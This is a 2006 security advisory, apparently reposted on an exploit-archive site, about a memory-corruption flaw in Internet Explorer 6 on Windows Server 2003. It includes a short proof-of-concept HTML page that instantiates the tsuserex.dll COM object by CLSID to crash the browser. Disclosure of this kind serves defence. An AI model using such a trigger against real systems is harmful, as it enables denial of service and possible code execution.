Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability

2006.08.18
Credit: nop
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Advisory ID: XSec-06-06 Advisory Name: Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability Release Date: 08/18/2006 Tested on: Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN Affected version: Windows Server 2003 + Internet Explorer 6.0 Author: nop <nop#xsec.org> http://www.xsec.org Overview: A vulnerability has been found in Internet Explorer 6.0 on Microsoft Windows 2003. When Internet Explorer tries to instantiate the tsuserex.dll (Terminal Services) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code. Exploit: =============== tsuserex.dll.htm start ================ <!-- // Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability // tested on Windows 2003 EE SP1 CN // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29} // Info: ADsTSUserEx Class // ProgID: tsuserex.ADsTSUserEx.1 // InprocServer32: C:\WINDOWS\system32\tsuserex.dll --!> <html><body> <object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object> </body> </html> =============== tsuserex.dll.htm end ================== Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14 About XSec: We are redhat.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top